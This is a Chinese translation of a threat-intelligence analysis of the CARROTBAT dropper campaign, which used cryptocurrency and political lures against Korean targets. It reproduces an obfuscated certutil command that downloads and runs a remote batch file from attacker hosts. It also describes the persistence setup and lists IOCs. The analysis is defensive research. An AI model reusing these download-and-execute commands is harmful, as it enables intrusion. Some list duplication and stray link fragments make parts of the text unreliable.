CARROTBAT家族針對東南亞地區發起攻擊

摘要： Unit 42近期發現了一項針對與韓國和朝鮮地區進行的釣魚活動，釣魚內容圍繞一系列主題展開，主要包括：加密貨幣，加密貨幣交易和政治事件。根據被投遞的惡意載荷中所包含的有關資訊，Unit 42將這個惡意軟體家族命名為了CARROTBAT。 CARROTBAT家族的樣本最早在201...

Unit 42近期發現了一項針對與韓國和朝鮮地區進行的釣魚活動，釣魚內容圍繞一系列主題展開，主要包括：加密貨幣，加密貨幣交易和政治事件。根據被投遞的惡意載荷中所包含的有關資訊，Unit 42將這個惡意軟體家族命名為了CARROTBAT。

CARROTBAT家族的樣本最早在2017年12月的一次攻擊中被發現的，此次攻擊是針對英國政府機構展開的，主要利用了SYSCON家族惡意軟體，儘管沒有明確證據表明CARROTBAT在攻擊中被使用，但是研究人員還是通過攻擊裝置的行為重疊來確認出了CARROTBAT家族，並發現了它與SYSCON家族系列軟體的聯絡。而此次攻擊事件的主角SYSCON是一款簡單的遠端訪問木馬（RAT），它使用檔案傳輸協議（FTP）進行網路通訊，具體報道見於 ofollow,noindex" target="_blank">https://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/。

迄今為止，一共識別出了29種不同的CARROTBAT樣本，其中包含12種已確認的不同誘餌檔案。這些樣本於今年3月開始出現，在過去的3個月內進行了大量的活動。與先前投遞的SYSCON家族惡意軟體不同，新的攻擊活動投遞了OceanSalt（ https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf）家族惡意軟體。我們將CARROTBAT及其投遞的相關載荷合併稱之為Fractured Block。

攻擊過程

2017年12月13日，yuri.sidorav @yandex [.]ru向英國政府機構內的高階人員傳送了一封魚叉釣魚郵件。此電子郵件的主題是“我們會在沒有先決條件的情況下與朝鮮對話”，此郵件的附件檔案也使用了同樣的命名方式。

在附件Word中顯示瞭如下內容：

美國將“無條件地”與朝鮮對話

文章主要討論了美國與朝鮮之間的外交關係，並且引用了NKNews[.]org當天釋出的文章（文章連結為： https://www.nknews.org/2017/12/u-s-would-talk-with-north-korea-without-precondition-tillerson/ ）。被引用的文章內容為：

附件文件利用DDE漏洞（漏洞介紹： https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/）執行了以下程式碼：

https://researchcenter.paloaltonetworks.com/2018/11/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/

DDE漏洞首次在2017年5月被利用於惡意攻擊。攻擊樣本中包含下載名為0_31.doc的遠端可執行檔案的命令，檔案被下載後以AAA.exe的檔名形式命名，並放在在受害者的％TEMP％目錄中。

被劃定到SYSCON家族的惡意載荷通過FTP伺服器與ftp.bytehost31[.]org via這個惡意伺服器進行連線，以接收遠端控制命令。

通過對惡意樣本中的域名881.000webhostapp[.]com進行關聯，又關聯出了一批樣本，其中包括KONNI惡意軟體系列樣本和4個CARROTBAT惡意軟體系列樣本（64位可執行檔案）。根據特徵進行篩選，最終篩選出了29個不同樣本。

Fractured Block攻擊

迄今為止，所有的CARROTBAT樣本都是包含在Fractured Block攻擊裡的。CARROTBAT用於投遞載荷來幫助攻擊者投遞並開啟一個嵌入式誘餌檔案，然後執行一個命令，該命令將在目標機器上下載並執行一個有效負載。此惡意軟體支援以下11種誘餌文件檔案格式：

.doc
.docx
.eml
.hwp
.jpg
.pdf
.png
.ppt
.pptx
.xls
.xlsx

在開啟嵌入式誘餌文件後，會在系統上執行以下混淆命令：

C: && cd %TEMP% && c^e^r^tutil -urlca^che -spl^it -f https://881.000webhostapp[.]com/1.txt && ren 1.txt 1.bat && 1.bat && exit

此命令將嘗試通過Microsoft Windows內建的certutil實用程式下載並執行遠端檔案。

通過對根據行為判別所找到的29個樣本的編譯時間戳進行研究，發現它們均在2018年3月到2018年9月之間，其中的11個被用於了實際的攻擊過程。樣本的編譯時間戳如下圖所示：

針對韓國受害者的大多數誘餌檔案都有與加密貨幣的主題相關。在其中的一個案例中，誘餌檔案包含了在COINVIL工作的個人名片，該組織宣佈計劃於2018年5月在菲律賓建立加密貨幣交易所。其他誘餌主題包括時事政治事件，如美國和朝鮮之間的關係，以及美國總統唐納德特朗普訪問新加坡峰會。CARROTBAT所投遞的惡意載荷各不相同，在2018年3月到2018年7月期間，可以觀察到所投遞的多個SYSCON惡意樣本，這些樣本通過FTP與以下主機進行C2通訊：

ftp.byethost7[.]com
ftp.byethost10[.]com
files.000webhost[.]com

從2018年6月開始，我們觀察到CARROTBAT開始投遞OceanSalt惡意軟體。在撰寫本文時，這些樣本仍處於活動狀態，並與61.14.210[.]72:7117進行C2通訊。

與其他威脅活動的關聯

CARROTBAT和KONNI惡意軟體之間存在一些伺服器重疊。KONNI是一種遠端訪問木馬，已經活躍了四年之久，具有廣泛的功能，通常利用000webhost等免費網路託管服務提供商的伺服器作為其C2地址。在撰寫本文時，這個特定的惡意軟體系列尚未被歸類為一個家族，但是該軟體的攻擊目標一直集中在東南亞地區。

上文反覆提到的另一種關聯是SYSCON惡意軟體。這個惡意軟體首次在2017年10月被報道，並且已經觀察到了攻擊中提供了與朝鮮有關的誘餌檔案。此款惡意軟體通常比較簡單，利用遠端FTP伺服器進行C2通訊。在下面的惡意活動關聯圖中，黃色的表示KONNI，紫色的表示SYSCON。

該家族與OceanSalt惡意軟體有效載荷也可能有一定關聯。McAfee在2018年10月首次進行了攻擊報道，受害者包括韓國、美國和加拿大。與McAfee報告中列出的樣本資訊一樣，在Fractured Block 攻擊中觀察到的OceanSalt樣本使用與Comment Crew（又名APT1）相同的程式碼，但是研究人員認為這些相似的程式碼是錯誤的標誌。Comment Crew使用的惡意軟體已經活躍了多年，因此研究人員表示此次活動與Crew活動的關聯性存疑。相關威脅活動的時間重疊表：

結論

CARROTBAT是識別Fractured Block攻擊活動的關鍵。通過尋找CARROTBAT，我們能夠找到相關的OceanSalt，SYSCON和KONNI活動。由於這些活動具備一些特徵重疊，因此我們懷疑這種威脅活動可能是由同一個攻擊組織發起的。但是，目前沒有確鑿證據。CARROTBAT惡意軟體是一種較為獨特的載荷投遞器，雖然它支援各種型別的誘餌檔案，並採用基本的命令混淆，但它並不複雜。

CARROTBAT技術分析

樣本資訊為：

MD5：3e4015366126dcdbdcc8b5c508a6d25c

SHA1：f459f9cfbd10b136cafb19cbc233a4c8342ad984

SHA256：aef92be267a05cbff83aec0f23d33dfe0c4cdc71f9a424f5a2e59ba62b7091de

檔案型別：PE32可執行檔案（GUI）Intel 80386，適用於MS Windows

編譯時間戳 2018-09-05 00:17:22 UTC

執行時，惡意軟體將讀取自身的最後8個位元組。這些位元組包括兩個DWORD，它們既包含嵌入的誘餌文件的長度，也包含它的檔案型別。

根據這些收集到的資訊，CARROTBAT減去先前檢索的8個位元組後繼續讀取自身的結尾。資料包含整個嵌入式誘餌文件，並寫入與原始惡意軟體相同的目錄和檔名。但是會根據先前檢索的檔案型別值更改副檔名，對應值為：

在此樣本中使用了.hwp副檔名的文件作為誘餌文件。在誘餌檔案被放入到磁碟後，它將在一個新程序中被開啟。隨後會給受害者顯示這個.hwp誘餌文件：BKN Bank加密貨幣交易的白皮書。

在顯示此文件後，惡意軟體將繼續在新程序中執行以下命令：

C: && cd %TEMP% && c^e^r^tutil -urlca^che -spl^it -f http://s8877.1apps[.]com/vip/1.txt && ren 1.txt 1.bat && 1.bat && exit

此命令將使用內建的Microsoft Windows certutil命令下載遠端檔案。在這個樣本中，將檢索以下指令碼：

該指令碼會檢查受害者的作業系統，並使用certutil可執行檔案再次下載相應的有效負載。

在本樣本中，有效載荷通過base64進行編碼，通過certutil進行解碼。惡意載荷是一個CAB檔案，在解壓縮後，惡意軟體會執行提取的install.bat指令碼，最後刪除原始檔案並退出。

下載的CAB檔案資訊為：

MD5：a943e196b83c4acd9c5ce13e4c43b4f4

SHA1：e66e416f300c7efb90c383a7630c9cfe901ff9fd

SHA256：cfe436c1f0ce5eb7ac61b32cd073cc4e4b21d5016ceef77575bef2c2783c2d62

檔案型別：Microsoft Cabinet歸檔資料，共181248位元組，3個檔案

上文提到的所刪除的檔案共有三個，分別是：

1. INSTALL.BAT（用於安裝批處理指令碼，負責將其他檔案複製到C： Users Public Downloads並設定Run登錄檔項以確保永續性。它還負責在退出之前刪除任何原始檔案。）
2. DrvUpdate.dll（OceanSalt惡意軟體）
3. winnet.ini（C2資訊）

C2資訊在外部winnet.ini檔案中儲存，並使用增量的XOR金鑰進行編碼。用Python編寫的以下函式可解碼此檔案：

解碼後，研究人員發現此OceanSalt病毒嘗試通過埠7117與61.14.210 [.] 72進行通訊。

IOC/">IOC

CARROTBAT樣本

d34aabf20ccd93df9d43838cea41a7e243009a3ef055966cb9dea75d84b2724d
8b6b4a0e0945c6daf3ebc8870e3bd37e54751f95162232d85dc0a0cc8bead9aa
26fc6fa6acc942d186a31dc62be0de5e07d6201bdff5d7b2f1a7521d1d909847
e218b19252f242a8f10990ddb749f34430d3d7697cbfb6808542f609d2cbf828
824f79a8ee7d8a23a0371fab83de44db6014f4d9bdea90b47620064e232fd3e3
70106ebdbf4411c32596dae3f1ff7bf192b81b0809f8ed1435122bc2a33a2e22
87c50166f2ac41bec7b0f3e3dba20c7264ae83b13e9a6489055912d4201cbdfc
ac23017efc19804de64317cbc90efd63e814b5bb168c300cfec4cfdedf376f4f
d965627a12063172f12d5375c449c3eef505fde1ce4f5566e27ef2882002b5d0
7d443434c302431734caf1d034c054ad80493c4c703d5aaeafa4a931a496b2ae
1142dcc02b9ef34dca2f28c22613a0489a653eb0aeafe1370ca4c00200d479e0
337b8c2aac80a44f4e7f253a149c65312bc952661169066fe1d4c113348cc27b
92b45e9a3f26b2eef4a86f3dae029f5821cffec78c6c64334055d75dbf2a62ef
42e18ef3aaadac5b40a37ec0b3686c0c2976d65c978a2b685fefe50662876ded
ba78f0a6ce53682942e97b5ad7ec76a2383468a8b6cd5771209812b6410f10cb
dca9bd1c2d068fc9c84a754e4dcf703629fbe2aa33a089cb50a7e33e073f5cea
7d8376057a937573c099e3afe2d8e4b8ec8cb17e46583a2cab1a4ac4b8be1c97
3cbccb059225669dcfdc7542ce28666e0b1a227714eaf4b16869808bffe90b96
aef92be267a05cbff83aec0f23d33dfe0c4cdc71f9a424f5a2e59ba62b7091de
2547b958f7725539e9bba2a1852a163100daa1927bb621b2837bb88007857a48
6c591dddd05a2462e252997dc9d1ba09a9d9049df564d00070c7da36e526a66a
22b16fa7af7b51880faceb33dd556242331daf7b7749cabd9d7c9735fb56aa10
3869c738fa80b1e127f97c0afdb6c2e1c15115f183480777977b8422561980dd
ba100e7bac8672b9fd73f2d0b7f419378f81ffb56830f6e27079cb4a064ba39a
e527ade24beacb2ef940210ba9acb21073e2b0dadcd92f1b8f6acd72b523c828
9fa69bdc731015aa7bdd86cd311443e6f829fa27a9ba0adcd49fa773fb5e7fa9
ffd1e66c2385dae0bb6dda186f004800eb6ceaed132aec2ea42b1ddcf12a5c4e
e3b45b2e5d3e37f8774ae22a21738ae345e44c07ff58f1ab7178a3a43590fddd
a0f53abde0d15497776e975842e7df350d155b8e63d872a914581314aaa9c1dc

SYSCON 載荷樣本

5a2c53a20fd66467e87290f5845a5c7d6aa8d460426abd30d4a6adcffca06b8b
fceceb104bed6c8e85fff87b1bf06fde5b4a57fe7240b562a51727a37034f659
fa712f2bebf30592dd9bba4fc3befced4c727b85a036550fc3ac70d1965f8de5
da94a331424bc1074512f12d7d98dc5d8c5028821dfcbe83f67f49743ae70652
2efdd25a8a8f21c661aab2d4110cd7f89cf343ec6a8674ff20a37a1750708f27
62886d8b9289bd92c9b899515ff0c12966b96dd3e4b69a00264da50248254bb7
f27d640283372eb805df794ae700c25f789d77165bb98b7174ee03a617a566d4
0bb099849ed7076177aa8678de65393ef0d66e026ad5ab6805c1c47222f26358
f4c00cc0d7872fb756e2dc902f1a22d14885bf283c8e183a81b2927b363f5084
e8381f037a8f70d8fc3ee11a7bec98d6406a289e1372c8ce21cf00e55487dafc
1c8351ff968f16ee904031f6fba8628af5ca0db01b9d775137076ead54155968
2da750b50ac396a41e99752d791d106b686be10c27c6933f0d3afe762d6d0c48
5d1388c23c94489d2a166a429b8802d726298be7eb0c95585f2759cebad040cf
0490e7d24defc2f0a4239e76197f1cba50e7ce4e092080d2f7db13ea0f88120b

OceanSalt 載荷樣本

5a2c53a20fd66467e87290f5845a5c7d6aa8d460426abd30d4a6adcffca06b8b
fceceb104bed6c8e85fff87b1bf06fde5b4a57fe7240b562a51727a37034f659
fa712f2bebf30592dd9bba4fc3befced4c727b85a036550fc3ac70d1965f8de5
da94a331424bc1074512f12d7d98dc5d8c5028821dfcbe83f67f49743ae70652
2efdd25a8a8f21c661aab2d4110cd7f89cf343ec6a8674ff20a37a1750708f27
62886d8b9289bd92c9b899515ff0c12966b96dd3e4b69a00264da50248254bb7
f27d640283372eb805df794ae700c25f789d77165bb98b7174ee03a617a566d4
0bb099849ed7076177aa8678de65393ef0d66e026ad5ab6805c1c47222f26358
f4c00cc0d7872fb756e2dc902f1a22d14885bf283c8e183a81b2927b363f5084
e8381f037a8f70d8fc3ee11a7bec98d6406a289e1372c8ce21cf00e55487dafc
1c8351ff968f16ee904031f6fba8628af5ca0db01b9d775137076ead54155968
2da750b50ac396a41e99752d791d106b686be10c27c6933f0d3afe762d6d0c48
5d1388c23c94489d2a166a429b8802d726298be7eb0c95585f2759cebad040cf
0490e7d24defc2f0a4239e76197f1cba50e7ce4e092080d2f7db13ea0f88120b

URL

https://881.000webhostapp[.]com/1.txt
http://attach10132.1apps[.]com/1.txt
https://071790.000webhostapp[.]com/1.txt
https://vnik.000webhostapp[.]com/1.txt
https://7077.000webhostapp[.]com/vic/1.txt
http://a7788.1apps[.]com/att/1.txt
http://s8877.1apps[.]com/vip/1.txt
http://hanbosston.000webhostapp[.]com/1.txt
http://bluemountain.1apps[.]com/1.txt
https://www.webmail-koryogroup[.]com/keep/1.txt
http://filer1.1apps[.]com/1.txt
ftp.byethost7[.]com
ftp.byethost10[.]com
files.000
webhost[.]com61.14.210[.]72:7117